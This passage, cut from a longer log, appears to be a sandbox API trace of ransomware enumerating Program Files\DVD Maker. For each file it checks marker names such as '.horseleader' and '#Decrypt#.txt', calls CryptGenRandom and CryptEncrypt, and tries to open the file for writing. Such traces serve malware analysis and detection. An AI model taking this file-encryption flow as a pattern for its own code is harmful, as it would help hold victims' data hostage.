ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x13400, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="rtstreamsink.ax", cAlternateFileName="")) returned 1 [0251.370] lstrcmpiW (lpString1="rtstreamsink.ax", lpString2="Windows") returned -1 [0251.370] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax") returned 46 [0251.371] StrStrIW (lpFirst="rtstreamsink.ax", lpSrch=".horseleader") returned 0x0 [0251.371] lstrcmpW (lpString1="rtstreamsink.ax", lpString2="#Decrypt#.txt") returned 1 [0251.371] lstrcmpW (lpString1="rtstreamsink.ax", lpString2="_uninstalling_.png") returned 1 [0251.371] lstrlenW (lpString=".testttjffg") returned 11 [0251.371] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax", lpSrch=".testttjffg") returned 0x0 [0251.371] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.371] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsink.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.371] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, 
cFileName="rtstreamsource.ax", cAlternateFileName="")) returned 1 [0251.372] lstrcmpiW (lpString1="rtstreamsource.ax", lpString2="Windows") returned -1 [0251.372] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax") returned 48 [0251.372] StrStrIW (lpFirst="rtstreamsource.ax", lpSrch=".horseleader") returned 0x0 [0251.372] lstrcmpW (lpString1="rtstreamsource.ax", lpString2="#Decrypt#.txt") returned 1 [0251.372] lstrcmpW (lpString1="rtstreamsource.ax", lpString2="_uninstalling_.png") returned 1 [0251.372] lstrlenW (lpString=".testttjffg") returned 11 [0251.372] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax", lpSrch=".testttjffg") returned 0x0 [0251.372] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.372] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.372] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsource.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.373] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd55c168a, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xd55c168a, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x499cc441, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x18208, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="SecretST.TTF", cAlternateFileName="")) returned 1 [0251.373] lstrcmpiW (lpString1="SecretST.TTF", 
lpString2="Windows") returned -1 [0251.373] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF") returned 43 [0251.373] StrStrIW (lpFirst="SecretST.TTF", lpSrch=".horseleader") returned 0x0 [0251.373] lstrcmpW (lpString1="SecretST.TTF", lpString2="#Decrypt#.txt") returned 1 [0251.373] lstrcmpW (lpString1="SecretST.TTF", lpString2="_uninstalling_.png") returned 1 [0251.374] lstrlenW (lpString=".testttjffg") returned 11 [0251.374] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF", lpSrch=".testttjffg") returned 0x0 [0251.374] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0251.374] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0251.374] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF" (normalized: "c:\\program files\\dvd maker\\secretst.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.374] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="Shared", cAlternateFileName="")) returned 1 [0251.374] lstrcmpiW (lpString1="Shared", lpString2="Windows") returned -1 [0251.374] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared") returned 37 
[0251.374] lstrcmpW (lpString1="Shared", lpString2=".") returned 1 [0251.374] lstrcmpW (lpString1="Shared", lpString2="..") returned 1 [0251.374] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.374] GetProcessHeap () returned 0x780000 [0251.374] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0251.375] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*") returned 39 [0251.375] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0251.377] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.377] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\.") returned 39 [0251.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.377] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x9f0852f1, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9f0852f1, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0251.377] lstrcmpiW (lpString1="..", lpString2="Windows") 
returned -1 [0251.377] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\..") returned 40 [0251.377] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.377] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dab239, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93dab239, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x68934cfd, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x30e4, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Common.fxh", cAlternateFileName="")) returned 1 [0251.377] lstrcmpiW (lpString1="Common.fxh", lpString2="Windows") returned -1 [0251.377] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh") returned 48 [0251.378] StrStrIW (lpFirst="Common.fxh", lpSrch=".horseleader") returned 0x0 [0251.378] lstrcmpW (lpString1="Common.fxh", lpString2="#Decrypt#.txt") returned 1 [0251.378] lstrcmpW (lpString1="Common.fxh", lpString2="_uninstalling_.png") returned 1 [0251.378] lstrlenW (lpString=".testttjffg") returned 11 [0251.378] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh", lpSrch=".testttjffg") returned 0x0 [0251.378] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.378] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.378] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Common.fxh" (normalized: "c:\\program files\\dvd maker\\shared\\common.fxh"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.378] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d12cc5, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93d12cc5, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x6895ae5b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6d1f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DissolveAnother.png", cAlternateFileName="")) returned 1 [0251.378] lstrcmpiW (lpString1="DissolveAnother.png", lpString2="Windows") returned -1 [0251.378] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png") returned 57 [0251.379] StrStrIW (lpFirst="DissolveAnother.png", lpSrch=".horseleader") returned 0x0 [0251.379] lstrcmpW (lpString1="DissolveAnother.png", lpString2="#Decrypt#.txt") returned 1 [0251.379] lstrcmpW (lpString1="DissolveAnother.png", lpString2="_uninstalling_.png") returned 1 [0251.379] lstrlenW (lpString=".testttjffg") returned 11 [0251.379] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png", lpSrch=".testttjffg") returned 0x0 [0251.379] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.379] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.379] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveAnother.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolveanother.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.380] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93d38e22, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x93d38e22, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x68980fb9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb7835, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DissolveNoise.png", cAlternateFileName="")) returned 1 [0251.380] lstrcmpiW (lpString1="DissolveNoise.png", lpString2="Windows") returned -1 [0251.381] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png") returned 55 [0251.381] StrStrIW (lpFirst="DissolveNoise.png", lpSrch=".horseleader") returned 0x0 [0251.381] lstrcmpW (lpString1="DissolveNoise.png", lpString2="#Decrypt#.txt") returned 1 [0251.381] lstrcmpW (lpString1="DissolveNoise.png", lpString2="_uninstalling_.png") returned 1 [0251.381] lstrlenW (lpString=".testttjffg") returned 11 [0251.381] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png", lpSrch=".testttjffg") returned 0x0 [0251.381] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0251.381] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0251.381] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DissolveNoise.png" (normalized: "c:\\program files\\dvd maker\\shared\\dissolvenoise.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.381] FindNextFileW 
(in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="DvdStyles", cAlternateFileName="DVDSTY~1")) returned 1 [0251.381] lstrcmpiW (lpString1="DvdStyles", lpString2="Windows") returned -1 [0251.382] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 47 [0251.382] lstrcmpW (lpString1="DvdStyles", lpString2=".") returned 1 [0251.382] lstrcmpW (lpString1="DvdStyles", lpString2="..") returned 1 [0251.382] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.382] GetProcessHeap () returned 0x780000 [0251.382] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0251.382] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*") returned 49 [0251.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0251.385] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 
[0251.385] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\.") returned 49 [0251.385] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.385] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9f0852f1, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabb4389, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1ad8615, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0251.386] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.386] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\..") returned 50 [0251.386] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.386] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.386] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec183f4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec183f4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x278b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="16to9Squareframe_Buttongraphic.png", cAlternateFileName="")) returned 1 [0251.386] lstrcmpiW (lpString1="16to9Squareframe_Buttongraphic.png", lpString2="Windows") returned -1 [0251.386] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 82 [0251.386] StrStrIW 
(lpFirst="16to9Squareframe_Buttongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.386] lstrcmpW (lpString1="16to9Squareframe_Buttongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.386] lstrcmpW (lpString1="16to9Squareframe_Buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.386] lstrlenW (lpString=".testttjffg") returned 11 [0251.386] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.386] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.387] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.387] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.388] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec3e551, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec3e551, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xcd6, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="16to9Squareframe_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.388] lstrcmpiW (lpString1="16to9Squareframe_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.388] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 88 [0251.388] StrStrIW (lpFirst="16to9Squareframe_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.388] lstrcmpW (lpString1="16to9Squareframe_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.388] lstrcmpW (lpString1="16to9Squareframe_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.388] lstrlenW (lpString=".testttjffg") returned 11 [0251.388] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.388] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.388] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.388] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.389] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec3e551, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec3e551, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49c9fe3b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xcf4, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="16to9Squareframe_VideoInset.png", cAlternateFileName="")) returned 1 [0251.403] lstrcmpiW 
(lpString1="16to9Squareframe_VideoInset.png", lpString2="Windows") returned -1 [0251.403] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png") returned 79 [0251.403] StrStrIW (lpFirst="16to9Squareframe_VideoInset.png", lpSrch=".horseleader") returned 0x0 [0251.403] lstrcmpW (lpString1="16to9Squareframe_VideoInset.png", lpString2="#Decrypt#.txt") returned 1 [0251.403] lstrcmpW (lpString1="16to9Squareframe_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0251.403] lstrlenW (lpString=".testttjffg") returned 11 [0251.403] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png", lpSrch=".testttjffg") returned 0x0 [0251.403] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.403] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.404] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.405] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ec646ae, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ec646ae, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49cc5f99, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2e55, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, 
cFileName="4to3Squareframe_Buttongraphic.png", cAlternateFileName="")) returned 1 [0251.405] lstrcmpiW (lpString1="4to3Squareframe_Buttongraphic.png", lpString2="Windows") returned -1 [0251.405] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png") returned 81 [0251.405] StrStrIW (lpFirst="4to3Squareframe_Buttongraphic.png", lpSrch=".horseleader") returned 0x0 [0251.405] lstrcmpW (lpString1="4to3Squareframe_Buttongraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.405] lstrcmpW (lpString1="4to3Squareframe_Buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.405] lstrlenW (lpString=".testttjffg") returned 11 [0251.406] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_Buttongraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.406] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.406] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.406] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 